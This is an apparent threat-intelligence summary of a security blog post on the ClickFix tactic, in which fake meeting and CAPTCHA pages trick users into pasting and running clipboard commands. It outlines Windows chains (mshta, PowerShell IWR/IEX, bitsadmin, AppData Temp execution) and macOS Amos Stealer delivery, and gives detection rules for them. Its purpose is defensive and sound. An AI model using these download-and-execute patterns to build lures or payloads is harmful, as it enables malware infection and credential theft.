Keypoints
- ClickFix tricks users into executing clipboard-injected commands via deceptive web pages (Google Meet, fake reCAPTCHA), leading to remote payload download and execution.
- The tactic targets both Windows (mshta, PowerShell, bitsadmin chains) and macOS (direct .dmg downloads installing Amos Stealer).
- Delivery vectors include compromised sites, redirection chains from illicit sites, and abuse of trusted platforms like GitHub issues to lure developers.
- Detection opportunities focus on process-tree anomalies (mshta → bitsadmin/PowerShell), suspicious PowerShell network activity, and file operations in AppDataTemp.
- Network-based detection can spot the ClickFix pattern by correlating small instruction fetches followed shortly by large binary downloads from the same host.
- Several intrusion sets and brokers (TA571, APT28) have adopted ClickFix, making continuous tracking and multi-source detection essential.
MITRE Techniques
- [T1203] Execution – Exploits user interaction with malicious web content to execute code. [‘Exploits user interaction with malicious web content to execute code.’]
- [T1071] Command and Control – Uses multiple command-and-control domains to maintain communication with compromised systems. [‘Utilizes multiple command and control domains to maintain communication with compromised systems.’]
- [T1003] Credential Dumping – Retrieves user credentials from compromised systems as part of follow-on activity. [‘Retrieves user credentials from compromised systems.’]
- [T1041] Exfiltration Over C2 Channel – Transfers data from the victim’s system to an external location controlled by attackers. [‘Transfers data from the victim’s system to an external location.’]
- [T1105] Remote File Copy – Downloads files from remote locations to the compromised host (bitsadmin, PowerShell). [‘Transfers files from a remote location to the compromised system.’]
- [T1059] Command and Scripting Interpreter – Executes malicious scripts (PowerShell, VBScript via mshta) to perform the attack chain. [‘Executes scripts to perform malicious actions on the target system.’]
Indicators of Compromise
- [Domain] public IP lookup / telemetry – api.ipify[.]org (used to retrieve victim public IP), and multiple unspecified C2 domains observed in the campaign.
- [File extension / payload] delivery artifacts – .dmg (Amos Stealer on macOS), .zip archives used to deliver Windows payloads and resulting .exe / .dll files.
- [Processes / binaries] abused legitimate tools – mshta.exe, bitsadmin.exe, powershell.exe (used as parent/child processes in infection chains).
- [File path] persistence / staging location – files saved under AppDataLocalTemp (payloads and extracted binaries stored and executed there).
- [Web pages / pages] lure pages and delivery vectors – fake Google Meet and fake reCAPTCHA pages, and exploitation of GitHub issues / redirection chains from cracked-software or streaming sites.
————
ClickFix deceives users with believable web UI elements (fake meeting or CAPTCHA pages) to guide them through keyboard shortcuts that paste and run a malicious command from the clipboard. That command typically invokes mshta or PowerShell to fetch a small instruction script and then a larger payload; on macOS the flow can download a .dmg (Amos Stealer), while on Windows it often uses mshta → VBScript → bitsadmin or PowerShell → download and execute from AppDataTemp.
Detection is most reliable when endpoint and network telemetry are correlated: look for mshta child processes launching bitsadmin or PowerShell with URLs on the command line, a PowerShell user-agent making a very small HTTP GET followed shortly by a large binary download, and file writes to AppDataTemp followed by execution. Because the commands are simple (IWR/IEX or encoded base64), rules that combine process-tree, file activity and temporal network patterns (e.g., instruction fetch then payload fetch within minutes) reduce false positives.
Defenders should monitor for the specific process-parent relationships (mshta → bitsadmin/wscript/powershell), unusual use of BITS to download executables, and low-volume instruction fetches from rarely seen domains or domains mimicking Google/Zoom. Maintain threat intelligence feeds for actor-linked indicators (TA571, APT28) and update detection rules as ClickFix delivery chains evolve to stay ahead of these social-engineering campaigns.
————
Read more: https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/